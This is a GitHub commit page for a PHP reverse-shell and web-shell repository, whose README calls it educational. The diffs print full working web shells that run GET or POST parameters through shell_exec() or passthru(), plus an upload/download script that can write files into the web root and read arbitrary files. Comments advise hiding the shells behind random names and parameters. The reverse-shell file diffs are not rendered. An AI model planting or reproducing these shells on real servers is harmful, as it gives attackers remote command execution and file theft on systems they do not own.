Skip to content

Commit b9feafe

Browse files
committed
Fine-Tuning
1 parent 9c5fc83 commit b9feafe

11 files changed

Lines changed: 389 additions & 391 deletions

README.md

Lines changed: 8 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -6,18 +6,18 @@ Works on Linux OS and macOS with `/bin/sh` and Windows OS with `cmd.exe`. Script
66

77
Works with both, `ncat` and `multi/handler`.
88

9-
Tested on XAMPP for Linux v7.3.19 (64-bit) with PHP v7.3.19 on Kali Linux v2020.2 (64-bit).
9+
Tested on:
1010

11-
Tested on XAMPP for OS X v7.4.10 (64-bit) with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit).
11+
* XAMPP for Linux v7.3.19 with PHP v7.3.19 on Kali Linux v2020.2 (64-bit),
12+
* XAMPP for OS X v7.4.10 with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit),
13+
* XAMPP for Windows v7.4.3 with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit),
14+
* Docker image [nouphet/docker-php4](https://hub.docker.com/r/nouphet/docker-php4) with PHP v4.4.0,
15+
* Docker image [steeze/php52-nginx](https://hub.docker.com/r/steeze/php52-nginx) with PHP v5.2.17.
1216

13-
Tested on XAMPP for Windows v7.4.3 (64-bit) with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit).
14-
15-
In addition, everything was tested on Docker images [nouphet/docker-php4](https://hub.docker.com/r/nouphet/docker-php4) with PHP v4.4.0 and [steeze/php52-nginx](https://hub.docker.com/r/steeze/php52-nginx) with PHP v5.2.17.
17+
**Process pipes on Windows OS do not support asynchronous operations so `stream_set_blocking()`, `stream_select()`, and `feof()` will not work properly, but I found a workaround.**
1618

1719
Made for educational purposes. I hope it will help!
1820

19-
**Process pipes on Windows OS do not support asynchronous operations so `stream_set_blocking()`, `stream_select()`, and `feof()` will not work properly, but I found a workaround.**
20-
2121
## Table of Contents
2222

2323
* [Reverse Shells](#reverse-shells)
@@ -48,15 +48,11 @@ Check the [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shel
4848

4949
Check the [simple PHP web shell v2](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get_v2.php) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.
5050

51-
Find out more about PHP obfuscation techniques for old versions of PHP at [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF). Credits to the author!
52-
5351
## File Upload/Download Script
5452

5553
Check the [simple PHP file upload/download script](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/files.php) based on HTTP POST request for file upload and HTTP GET request for file download.
5654

57-
When downloading a file, you must [URL encode](https://www.urlencoder.org) the file path, and don't forget to specify the output file if using cURL.
58-
59-
When uploading a file, don't forget to specify `@` before the file path.
55+
When downloading a file, you must [URL encode](https://www.urlencoder.org) the file path.
6056

6157
Depending on the server configuration, downloading a file through HTTP GET request parameter might not always work, instead, you will have to hardcore the file path in the script.
6258

src/reverse/php_reverse_shell.php

Lines changed: 161 additions & 161 deletions
Large diffs are not rendered by default.

src/reverse/php_reverse_shell_older.php

Lines changed: 159 additions & 159 deletions
Large diffs are not rendered by default.

src/web/files.php

Lines changed: 19 additions & 19 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
<?php
22
// Copyright (c) 2021 Ivan Šincek
3-
// v2.6
3+
// v3.0
44
// Requires PHP v4.0.3 or greater because move_uploaded_file() is used.
55

66
// modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell
@@ -10,25 +10,25 @@
1010
$parameter = 'file';
1111
$output = null;
1212
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'post' && isset($_FILES[$parameter]['name']) && ($_FILES[$parameter]['name'] = trim($_FILES[$parameter]['name'])) && strlen($_FILES[$parameter]['name']) > 0) {
13-
$output = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . $_FILES[$parameter]['name'];
14-
if (@move_uploaded_file($_FILES[$parameter]['tmp_name'], $output) === false) {
15-
$output = 'ERROR: Cannot upload file.';
16-
} else {
17-
$output = "SUCCESS: File was uploaded to '{$output}'";
18-
}
19-
unset($_FILES[$parameter]);
13+
$output = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . $_FILES[$parameter]['name'];
14+
if (@move_uploaded_file($_FILES[$parameter]['tmp_name'], $output) === false) {
15+
$output = 'ERROR: Cannot upload file';
16+
} else {
17+
$output = "SUCCESS: File was uploaded to '{$output}'";
18+
}
19+
unset($_FILES[$parameter]);
2020
}
2121
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'get' && isset($_GET[$parameter]) && ($_GET[$parameter] = trim($_GET[$parameter])) && strlen($_GET[$parameter]) > 0) {
22-
$output = @file_get_contents($_GET[$parameter]);
23-
if ($output === false) {
24-
$output = 'ERROR: Cannot download file';
25-
} else {
26-
header('Content-Type: application/octet-stream');
27-
header('Content-Disposition: attachment; filename="' . basename($_GET[$parameter]) . '"');
28-
echo $output;
29-
$output = 'download';
30-
}
31-
unset($_GET[$parameter]);
22+
$output = @file_get_contents($_GET[$parameter]);
23+
if ($output === false) {
24+
$output = 'ERROR: Cannot download file';
25+
} else {
26+
header('Content-Type: application/octet-stream');
27+
header('Content-Disposition: attachment; filename="' . basename($_GET[$parameter]) . '"');
28+
echo $output;
29+
$output = 'download';
30+
}
31+
unset($_GET[$parameter]);
3232
}
3333
// if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
3434
// garbage collector requires PHP v5.3.0 or greater
@@ -44,7 +44,7 @@
4444
<meta name="viewport" content="width=device-width, initial-scale=1.0">
4545
</head>
4646
<body>
47-
<form method="post" enctype="multipart/form-data" action="<?php echo './' . basename($_SERVER['SCRIPT_FILENAME']); ?>">
47+
<form method="post" enctype="multipart/form-data" action="./<?php echo basename($_SERVER['SCRIPT_FILENAME']); ?>">
4848
<input name="<?php echo $parameter; ?>" type="file" required="required">
4949
<input type="submit" value="Upload">
5050
</form>

src/web/minified/files_mini.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
<?php $p='file';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='post'&&isset($_FILES[$p]['name'])&&($_FILES[$p]['name']=trim($_FILES[$p]['name']))&&strlen($_FILES[$p]['name'])>0){$o=$_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES[$p]['name'];if(@move_uploaded_file($_FILES[$p]['tmp_name'],$o)===false){$o='ERROR: Cannot upload file.';}else{$o="SUCCESS: File was uploaded to '{$o}'";}unset($_FILES[$p]);}if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@file_get_contents($_GET[$p]);if($o===false){$o='ERROR: Cannot download file';}else{header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($_GET[$p]).'"');echo $o;$o='download';}unset($_GET[$p]);}/*if($o!='download'){echo"<pre>{$o}</pre>";unset($o);}/*@gc_collect_cycles();*/ ?><?php if($o!='download'): ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>PHP File Upload/Download</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" enctype="multipart/form-data" action="<?php echo './'.basename($_SERVER['SCRIPT_FILENAME']); ?>"><input name="<?php echo $p; ?>" type="file" required="required"><input type="submit" value="Upload"></form><pre><?php echo $o;unset($o);/*@gc_collect_cycles();*/ ?></pre></body></html><?php endif; ?>
1+
<?php $p='file';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='post'&&isset($_FILES[$p]['name'])&&($_FILES[$p]['name']=trim($_FILES[$p]['name']))&&strlen($_FILES[$p]['name'])>0){$o=$_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES[$p]['name'];if(@move_uploaded_file($_FILES[$p]['tmp_name'],$o)===false){$o='ERROR: Cannot upload file';}else{$o="SUCCESS: File was uploaded to '{$o}'";}unset($_FILES[$p]);}if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@file_get_contents($_GET[$p]);if($o===false){$o='ERROR: Cannot download file';}else{header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($_GET[$p]).'"');echo $o;$o='download';}unset($_GET[$p]);}if($o!='download'){echo"<pre>{$o}</pre>";}unset($o); ?><?php if($o!='download'): ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>PHP File Upload/Download</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" enctype="multipart/form-data" action="./<?php echo basename($_SERVER['SCRIPT_FILENAME']); ?>"><input name="<?php echo $p; ?>" type="file" required="required"><input type="submit" value="Upload"></form><pre><?php echo $o; ?></pre></body></html><?php endif;unset($o);/*@gc_collect_cycles();*/ ?>
Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
<?php header('Content-Type: text/plain; charset=UTF-8');$p='command';if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){if(@passthru("($_GET[$p]) 2>&1")===false){echo 'ERROR: The function might be disabled.';}unset($_GET[$p]);/*@gc_collect_cycles();*/} ?>
1+
<?php header('Content-Type: text/plain; charset=UTF-8');$p='command';if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){if(@passthru("($_GET[$p]) 2>&1")===false){echo 'ERROR: The method might be disabled';}unset($_GET[$p]);/*@gc_collect_cycles();*/} ?>
Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
<?php $p='command';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o='ERROR: The function might be disabled.';}else{$o=str_replace('<','&lt;',$o);$o=str_replace('>','&gt;',$o);}/*echo "<pre>{$o}</pre>";unset($o);unset($_GET[$p]);/*@gc_collect_cycles();*/} ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><pre><?php echo $o;unset($o);unset($_GET[$p]);/*@gc_collect_cycles();*/ ?></pre></body></html>
1+
<?php $p='command';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='get'&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o='ERROR: The method might be disabled';}else{$o=str_replace('<','&lt;',$o);$o=str_replace('>','&gt;',$o);}} ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><pre><?php echo $o; ?></pre></body></html><?php unset($o);unset($_GET[$p]);/*@gc_collect_cycles();*/ ?>
Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
<?php $p='command';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='post'&&isset($_POST[$p])&&($_POST[$p]=trim($_POST[$p]))&&strlen($_POST[$p])>0){$o=@shell_exec("($_POST[$p]) 2>&1");if($o===false){$o='ERROR: The function might be disabled.';}else{$o=str_replace('<','&lt;',$o);$o=str_replace('>','&gt;',$o);}/*echo "<pre>{$o}</pre>";unset($o);unset($_POST[$p]);/*@gc_collect_cycles();*/} ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" action="<?php echo './'.basename($_SERVER['SCRIPT_FILENAME']); ?>"><input name="<?php echo $p; ?>" type="text" required="required" autofocus="autofocus" placeholder="Enter Command"></form><pre><?php echo $o;unset($o);unset($_POST[$p]);/*@gc_collect_cycles();*/ ?></pre></body></html>
1+
<?php $p='command';$o=null;if(isset($_SERVER['REQUEST_METHOD'])&&strtolower($_SERVER['REQUEST_METHOD'])==='post'&&isset($_POST[$p])&&($_POST[$p]=trim($_POST[$p]))&&strlen($_POST[$p])>0){$o=@shell_exec("($_POST[$p]) 2>&1");if($o===false){$o='ERROR: The method might be disabled';}else{$o=str_replace('<','&lt;',$o);$o=str_replace('>','&gt;',$o);}} ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" action="./<?php echo basename($_SERVER['SCRIPT_FILENAME']); ?>"><input name="<?php echo $p; ?>" type="text" required="required" autofocus="autofocus" placeholder="Enter Command"></form><pre><?php echo $o; ?></pre></body></html><?php unset($o);unset($_POST[$p]);/*@gc_collect_cycles();*/ ?>
Lines changed: 14 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
<?php
22
// Copyright (c) 2021 Ivan Šincek
3-
// v2.6
3+
// v3.0
44
// Requires PHP v4.0.0 or greater.
55

66
// modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell
@@ -10,17 +10,17 @@
1010
$parameter = 'command';
1111
$output = null;
1212
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'get' && isset($_GET[$parameter]) && ($_GET[$parameter] = trim($_GET[$parameter])) && strlen($_GET[$parameter]) > 0) {
13-
// if shell_exec() is disabled, search for an alternative method
14-
$output = @shell_exec("($_GET[$parameter]) 2>&1");
15-
if ($output === false) {
16-
$output = 'ERROR: The method might be disabled';
17-
} else {
18-
$output = str_replace('<', '&lt;', $output);
19-
$output = str_replace('>', '&gt;', $output);
20-
}
21-
// if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
22-
// garbage collector requires PHP v5.3.0 or greater
23-
// echo "<pre>{$output}</pre>"; unset($output); unset($_GET[$parameter]);/* @gc_collect_cycles();*/
13+
// if shell_exec() is disabled, search for an alternative method
14+
$output = @shell_exec("($_GET[$parameter]) 2>&1");
15+
if ($output === false) {
16+
$output = 'ERROR: The method might be disabled';
17+
} else {
18+
$output = str_replace('<', '&lt;', $output);
19+
$output = str_replace('>', '&gt;', $output);
20+
}
21+
// if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
22+
// garbage collector requires PHP v5.3.0 or greater
23+
// echo "<pre>{$output}</pre>"; unset($output); unset($_GET[$parameter]);/* @gc_collect_cycles();*/
2424
}
2525
?>
2626
<!DOCTYPE html>
@@ -32,6 +32,7 @@
3232
<meta name="viewport" content="width=device-width, initial-scale=1.0">
3333
</head>
3434
<body>
35-
<pre><?php echo $output; unset($output); unset($_GET[$parameter]);/* @gc_collect_cycles();*/ ?></pre>
35+
<pre><?php echo $output; ?></pre>
3636
</body>
3737
</html>
38+
<?php unset($output); unset($_GET[$parameter]);/* @gc_collect_cycles();*/ ?>
Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
<?php
22
// Copyright (c) 2021 Ivan Šincek
3-
// v2.6
3+
// v3.0
44
// Requires PHP v4.0.0 or greater.
55

66
// modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell
@@ -11,12 +11,12 @@
1111
// your parameter/key here
1212
$parameter = 'command';
1313
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'get' && isset($_GET[$parameter]) && ($_GET[$parameter] = trim($_GET[$parameter])) && strlen($_GET[$parameter]) > 0) {
14-
// if passthru() is disabled, search for an alternative method
15-
if (@passthru("($_GET[$parameter]) 2>&1") === false) {
16-
echo 'ERROR: The method might be disabled';
17-
}
18-
unset($_GET[$parameter]);
19-
// garbage collector requires PHP v5.3.0 or greater
20-
// @gc_collect_cycles();
21-
}
14+
// if passthru() is disabled, search for an alternative method
15+
if (@passthru("($_GET[$parameter]) 2>&1") === false) {
16+
echo 'ERROR: The method might be disabled';
17+
}
18+
unset($_GET[$parameter]);
19+
// garbage collector requires PHP v5.3.0 or greater
20+
// @gc_collect_cycles();
21+
}
2222
?>

0 commit comments

Comments
 (0)